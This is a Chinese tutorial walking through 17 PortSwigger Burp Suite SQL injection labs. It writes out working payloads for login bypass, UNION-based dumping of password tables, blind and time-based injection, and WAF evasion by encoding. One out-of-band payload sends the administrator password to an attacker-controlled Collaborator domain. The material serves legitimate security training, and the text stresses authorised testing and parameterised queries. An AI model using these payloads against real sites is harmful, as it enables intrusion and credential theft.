1. 从零开始认识Burp Suite与SQL注入如果你刚开始接触Web安全可能会觉得Burp Suite和SQL注入这两个词听起来有点吓人。别担心我刚开始学的时候也是一头雾水感觉像在看天书。但实际用起来你会发现Burp Suite其实就是个“超级浏览器”它能帮你看到浏览器和网站服务器之间所有的“悄悄话”。而SQL注入呢简单来说就是黑客在网站输入框里“说”一些特殊的“暗号”骗网站背后的数据库执行不该执行的命令从而偷看、修改甚至删除数据。我打个比方这就像你去图书馆查资料。正常情况下你告诉管理员“我想找一本关于编程的书。”管理员就去书库里帮你找。但SQL注入的攻击者会说“我想找一本关于编程的书另外请把整个图书馆所有读者的借阅记录也拿给我看看。”如果图书馆的管理系统也就是网站程序设计得不好它可能真的会傻乎乎地把后面那句也当成合法的查询指令去执行。Burp Suite就是那个帮你“监听”和“模拟”这种对话过程的工具让你能亲自测试一个网站的管理系统到底傻不傻。为什么我们要用Burp Suite官方实验室来学SQL注入呢因为它提供了一个绝对安全、合法的“沙盒”环境。里面的靶场网站就是专门设计来让你“黑”的你不用担心法律问题也不用怕把别人的真网站搞垮。你可以放开手脚尝试各种攻击手法亲眼看到每一种攻击是怎么生效的网站又是怎么“中招”的。这种实战经验比看一百篇理论文章都管用。接下来我会带你手把手地通关这17个Lab。咱们不搞那些虚头巴脑的理论堆砌就是实打实地操作、观察、理解。我会把我自己踩过的坑、试出来的技巧都告诉你保证你看完就能自己上手玩转Burp Suite彻底搞懂SQL注入的来龙去脉。准备好了吗咱们先从最简单的开始。2. 热身运动基础注入与登录绕过2.1 第一关让隐藏的商品现身第一个Lab非常简单目的是让你找到感觉。靶场是一个商品分类页面比如你点“Lifestyle”标签浏览器地址栏会变成/filter?categoryLifestyle。这说明网站把咱们选中的分类名直接拼接到数据库查询语句里了。最初的思路是试探。我在Lifestyle后面加了个单引号页面报错了。这是个好迹象说明我们的输入被当成了SQL代码的一部分而不是普通数据。接着我尝试用注释符--把SQL语句后面的部分比如LIMIT子句给“注释掉”。在大多数数据库里--后面的内容会被忽略。于是我构造了这样的输入Lifestyle--。果然页面不再只显示限定数量的商品而是把这一类别的所有商品包括一些原本隐藏的全都显示出来了。但这还不够过瘾。我想看到所有分类的商品。怎么办用OR 11这个“万能钥匙”。我输入了Lifestyle OR 11--。这个语句的意思翻译过来就是“查询所有分类是‘Lifestyle’的商品或者……1等于1的记录。” 而11是个永远为真的条件。所以整个查询条件就变成了“真”数据库就会乖乖返回所有商品数据不管它属于哪个分类。页面刷地一下列出了所有商品第一关就这么轻松过了。这里的关键是理解OR逻辑运算符如何扩大了查询范围以及如何利用永真条件来绕过原始过滤。2.2 第二关不用密码也能进管理员后台第二个Lab模拟了一个登录场景。通常登录的SQL语句是这样的SELECT * FROM users WHERE username输入的用户名 AND password输入的密码。如果用户名和密码都对就让你登录。我们的目标是绕过密码验证用管理员账号administrator登录。方法就是利用SQL注入让密码检查的部分失效。我在用户名框里输入了administrator--密码框随便填了点东西比如123。提交后Burp Suite抓到的请求里这个输入被拼接到SQL语句中就变成了SELECT * FROM users WHERE usernameadministrator-- AND password123。看到没--把后面检查密码的AND password123整个都注释掉了于是语句的实际执行部分只剩下查找用户名为administrator这一条。只要这个用户存在数据库就会返回他的信息网站就以为我们密码也对顺利让我们登录进了管理员后台。这一关虽然简单但揭示了登录框一个极其经典且危险的漏洞。很多早期的网站甚至一些安全意识薄弱的现代网站仍然存在这种问题。它告诉我们永远不要相信用户输入必须对输入进行严格的过滤和参数化处理。3. 联合查询的艺术从探测到窃取数据3.1 第三关摸清数据库的“底细”从第三关开始我们要使用UNION攻击了。UNION操作符可以把多条SELECT语句的结果合并成一个结果集。但有个前提每条SELECT语句查询的列数必须相同。所以我们的第一步永远是判断当前查询的列数。最常用的方法就是用ORDER BY子句。ORDER BY 1表示按第一列排序ORDER BY 2按第二列以此类推。如果指定的列数超过了实际列数数据库就会报错。在靶场里我依次尝试了 ORDER BY 1-- ORDER BY 2-- ORDER BY 3--页面都正常显示。当我尝试 ORDER BY 4--时页面报错了。这就清晰地告诉我们原始查询返回了3列数据。知道列数后就可以构造UNION SELECT了。为了匹配列数我输入了 UNION SELECT NULL, NULL, NULL--。这里用NULL是因为它在所有数据库类型中都是通用的占位符。页面正常执行说明联合查询成功。这一步是后续所有数据窃取的基础就像开锁前得先知道锁有几个齿孔一样。3.2 第四关寻找能显示文本的“窗口”知道了列数下一步是找出哪些列的数据类型是字符串或能显示文本因为只有这样的列我们注入查询的结果才能被我们看到。我使用了UNION SELECT a, NULL, NULL--这样的payload。如果第一个列能显示文本那么页面某个位置应该会出现一个字母“a”。我依次测试了三个位置 UNION SELECT a, NULL, NULL-- UNION SELECT NULL, a, NULL-- UNION SELECT NULL, NULL, a--。结果发现第二列显示了“a”。太好了第二个位置就是我们的“回显点”后续可以把我们想查询的数据放在这个位置显示出来。3.3 第五关直捣黄龙一锅端掉用户表有了前两关的铺垫这一关的目标很直接从其他表比如users表里把管理员账号密码偷出来。首先用ORDER BY确认当前查询有2列并且找到了字符串回显点假设在第二列。题目通常会给出提示比如存在users表里面有username和password字段。那么构造的Payload就很简单了 UNION SELECT username, password FROM users--。这里我把username放在第一列可能不显示password放在第二列我们的回显点。执行后页面上果然在商品列表的某个位置清晰地显示出了administrator和其对应的一串密码哈希值如r9p7687yedddtfy9ugd5。复制密码去登录框一试成功进入管理员账户。这种攻击之所以危险是因为它能让攻击者直接 dump 出整个用户表的数据导致大规模数据泄露。3.4 第六关当一列需要承载多个信息这一关稍微增加了点难度原始查询虽然返回2列但只有一个列能显示字符串数据。而我们想查询的username和password是两个字段。怎么办我们需要把两个字段的值“拼”在一起放到这一个能显示的列里。不同数据库的字符串连接方法不同。这个靶场用的是Oracle数据库它使用双竖线||作为连接符。所以我的Payload变成了 UNION SELECT NULL, username || : || password FROM users--。这个语句的意思是从users表里取出用户名和密码用冒号:连接起来然后作为一个整体字符串放到第二列去显示。执行后页面显示类似administrator:q1g44lzx12wu6k5zag77这样的结果。同样拿着密码就能成功登录。这个技巧在回显点有限的情况下非常实用是攻击者必须掌握的变通方法。4. 信息搜集识别数据库与挖掘结构4.1 第七关与第八关数据库版本侦察在真实的攻击中知道目标用什么数据库是MySQL、Oracle、PostgreSQL还是SQL Server以及什么版本至关重要。因为不同数据库的语法、系统表和函数都有差异后续的攻击Payload需要“对症下药”。第七关针对Oracle数据库。Oracle查询版本的标准语句是SELECT banner FROM v$version。结合联合查询我构造了 UNION SELECT NULL, banner FROM v$version--。执行后版本信息如“Oracle Database 11g Express Edition...”就清晰地显示在了页面上。第八关则针对MySQL和Microsoft SQL Server。MySQL的版本查询是SELECT version而MSSQL是SELECT version或SELECT version()。此外注释符也不同MySQL可以用#MSSQL和很多其他数据库用--。在测试时我需要根据页面反应来判断到底是哪种数据库然后使用对应的Payload。例如输入 UNION SELECT NULL, version#如果成功那很可能就是MySQL。4.2 第九关与第十关非Oracle与Oracle数据库的“扒库”手法知道了数据库类型我们就要像侦探一样摸清数据库里到底有哪些表表里有哪些列。这叫做“数据库结构探测”。对于像MySQL、PostgreSQL这类使用“信息模式”information_schema的数据库第九关过程比较标准查所有表名 UNION SELECT NULL, table_name FROM information_schema.tables--。从结果里找到像users_xxxxxx这样疑似存放用户凭证的表名。查指定表的所有列名 UNION SELECT NULL, column_name FROM information_schema.columns WHERE table_nameusers_xxxxxx--。这里会返回username_xxxx,password_xxxx这样的列名。最后窃取数据 UNION SELECT NULL, username_xxxx || : || password_xxxx FROM users_xxxxxx--。而对于Oracle数据库第十关它的系统表名不一样查所有表名 UNION SELECT NULL, table_name FROM all_tables--。寻找类似USERS_XXXXX的表。查指定表的列名 UNION SELECT NULL, column_name FROM all_tab_columns WHERE table_name USERS_XXXXX--。窃取数据方法和前面一样用||连接符拼接字段并查询。这两关是SQL注入中技术性较强的部分需要你对不同数据库的系统表有基本了解。在实际操作中我经常会把常用的查询语句比如查表名、列名保存在Burp Suite的笔记或工具里随时取用能大大提高效率。5. 盲注的挑战当错误信息被隐藏前面的攻击网站都会把数据库的错误信息或查询结果直接“回显”在页面上这属于“有回显注入”。但稍微有点安全意识的网站都会关闭错误提示。这时候我们就需要用更高级的技巧——“盲注”。5.1 第十一关基于布尔逻辑的盲注这一关无论你输入什么页面看起来都“正常”没有数据回显也没有明显的报错。但是它有一个细微差别当注入的SQL语句逻辑为“真”时页面会多显示一个“Welcome back”的单词为“假”时这个词就消失。这就像玩一个“是或否”的猜谜游戏。我们可以通过精心构造的SQL问题根据页面是否有“Welcome back”来推断答案。例如问题“users表是否存在” Payload: AND (SELECT x FROM users LIMIT 1)x。如果返回“Welcome back”说明表存在。问题“administrator用户的密码长度大于10吗” Payload: AND (SELECT x FROM users WHERE usernameadministrator AND LENGTH(password)10)x。手工这样一位一位猜密码比如猜第一位是不是‘a’是不是‘b’…会累死人。所以必须借助工具自动化。Burp Suite的Intruder模块就是干这个的。我设置攻击类型为“Cluster bomb”第一个Payload集是密码的位数1到20第二个Payload集是小写字母a-z和数字0-9。然后让Intruder自动发送成千上万个请求通过观察哪个请求返回了“Welcome back”就能逐个位置地爆破出密码。这个过程可能耗时几分钟但完全自动化我们只需要喝杯咖啡等结果就行。5.2 第十二关基于错误信息的盲注这一关连“Welcome back”这种细微差别都没了页面完全一样。但是我们可以故意触发数据库的运行时错误如果页面返回了错误比如500内部服务器错误就说明我们注入的条件为“真”。这利用了数据库的CASE语句和除零错误。以Oracle为例Payload: || (SELECT CASE WHEN (11) THEN TO_CHAR(1/0) ELSE END FROM dual) || 。如果页面报错说明11这个真条件被执行了进而执行了TO_CHAR(1/0)触发错误。那么把11换成我们的问题比如SUBSTR(password, 1, 1)a就能通过页面是否报错来判断密码的第一位是不是‘a’。同样这个过程也需要用Burp Intruder进行自动化爆破。虽然比布尔盲注更隐蔽但原理是相通的构造一个二选一的问题真或假然后通过观察页面行为的差异正常 vs 报错来获取答案。6. 时间盲注与带外攻击终极隐匿手段6.1 第十三关与第十四关让数据库“睡一觉”来告诉我们答案如果网站连错误信息都屏蔽得干干净净页面响应无论对错都完全一致那怎么办还有最后一招时间盲注。原理是如果我们的注入条件为真就让数据库执行一个睡眠延迟函数等待几秒再响应如果为假就立刻响应。通过测量页面响应时间的长短我们就能判断条件真假。不同数据库的睡眠函数不同MySQL:SLEEP(10)PostgreSQL:pg_sleep(10)Microsoft SQL Server:WAITFOR DELAY 0:0:10Oracle:dbms_pipe.receive_message((a),10)第十三关很简单只是让你测试延迟函数是否生效。我输入了 || pg_sleep(10)--页面果然等了10秒才加载证明存在时间注入漏洞。第十四关则是实战用时间延迟来爆破管理员密码。Payload变得更复杂 || (SELECT CASE WHEN (SUBSTRING(password,1,1)a) THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users WHERE usernameadministrator)--。这个语句的意思是如果密码第一位是‘a’就睡10秒否则不睡。用Burp Intruder爆破时必须将攻击线程Threads设置为1。因为如果多个请求并发响应时间会互相干扰无法准确判断哪个请求触发了延迟。你需要盯着“响应时间”这一列找到那个响应时间明显超过10秒的请求对应的Payload就是正确的字符。这个过程比前两种盲注更慢但却是最隐蔽、最难防御的注入方式之一。6.2 第十五关与第十六关带外数据外泄这是一种更高级、更直接的攻击方式不依赖于页面内容或响应时间而是让数据库主动发起一个网络连接如DNS查询到我们控制的服务器从而把数据带出来。这通常用于目标网络出口防火墙规则很严但DNS查询通常被允许的情况。Burp Suite Professional版自带一个叫Burp Collaborator的神器。它能生成一个临时的、唯一的域名如xxx.burpcollaborator.net。我们的攻击Payload就是让数据库去访问这个域名。第十五关我们只是测试带外通道是否畅通。Payload以Oracle为例类似 UNION SELECT EXTRACTVALUE(xmltype(?xml version1.0?!DOCTYPE root [ !ENTITY % remote SYSTEM http://我们的Collaborator域名/ %remote;]),/l) FROM dual--。如果攻击成功在Burp Collaborator客户端就会收到来自目标数据库服务器的DNS查询记录证明漏洞存在。第十六关我们要利用这个通道偷数据。我们把查询到的密码作为子域名的一部分发送出来... SYSTEM http://||(SELECT password FROM users WHERE usernameadministrator)||.我们的Collaborator域名/ ...。如果管理员密码是secret数据库就会尝试访问secret.我们的Collaborator域名。我们在Collaborator客户端看到的DNS查询记录里就会包含secret这个子域名从而间接获取到密码。这种方法极其隐蔽几乎无法通过传统的Web日志监控发现。7. 实战进阶绕过防御与工具技巧7.1 第十七关利用编码绕过WAF最后一关模拟了一个更真实的场景网站使用了Web应用防火墙WAF。当我们尝试普通的UNION SELECT注入时Payload会被WAF识别并拦截。这个靶场的注入点比较特殊在一个XML格式的数据包里storeId1/storeId。我首先测试了storeId11/storeId返回了和storeId2/storeId一样的结果证明这里存在数字型注入并且会进行数学运算。但当我注入1 UNION SELECT NULL, NULL时请求被WAF阻止了。这时就需要Hackvertor这个Burp插件来帮忙了。Hackvertor可以对Payload进行各种编码转换。我选中UNION SELECT NULL, NULL这部分通过Hackvertor将其转换为十六进制实体编码。转换后它看起来是一堆像U这样的代码。对于WAF来说这可能只是一串普通的XML实体但数据库在解析XML时会先将其解码还原成UNION SELECT语句从而成功执行注入绕过了WAF的规则匹配。最终我使用编码后的Payload成功执行了联合查询并将用户名和密码拼接后取出1 UNION SELECT username || : || password FROM users。这关告诉我们面对WAF灵活运用编码、大小写变换、注释混淆等技术往往能出其不意。7.2 Burp Suite实战心得与避坑指南走完这17个Lab你基本上就算SQL注入入门了。但我想分享几个我实战中总结的、教程里不常提的点第一心态要稳思路要活。不是每个注入点都像靶场这么标准。遇到不报错、不回显的情况先别慌按部就班地测试先试布尔盲注看看页面内容有无细微变化再试时间盲注用SLEEP(2)这种短延迟先试试水。多用AND 11和AND 12这种经典组合做真假测试。第二善用Burp的配套工具。Repeater是你手动测试Payload的沙盘可以反复修改发送观察响应。Intruder是自动化爆破的利器除了爆破密码还能用来模糊测试参数、枚举数据库名、表名等。Decoder和Comparer也经常用到一个用来编解码Payload一个用来精细比较两次响应的差异在盲注时特别有用。第三注意数据库的“小脾气”。MySQL的注释符#在URL里要编码成%23Oracle的字符串连接用||而MySQL用CONCAT()函数或空格查询版本信息的语句更是五花八门。我建议你建个自己的备忘清单或者直接利用Burp的Cheat Sheet功能。第四永远合法测试。这套实验室最大的价值就是给了我们一个合法的练兵场。在未经授权的情况下对任何真实网站进行SQL注入测试都是非法的可能面临法律风险。你的技能应该用在授权渗透测试、漏洞赏金项目或者像PortSwigger Academy这样的学习平台上。最后防御SQL注入其实并不复杂核心就一条使用参数化查询预编译语句让数据库把用户输入永远当作“数据”来处理而不是可能被执行的“代码”。作为开发者这是必须养成的习惯作为安全研究者理解攻击手法是为了更好地构建防御。希望这趟Burp Suite的SQL注入实战之旅能让你不仅成为一个合格的“攻击者”更能成为一个心中有数的“防御者”。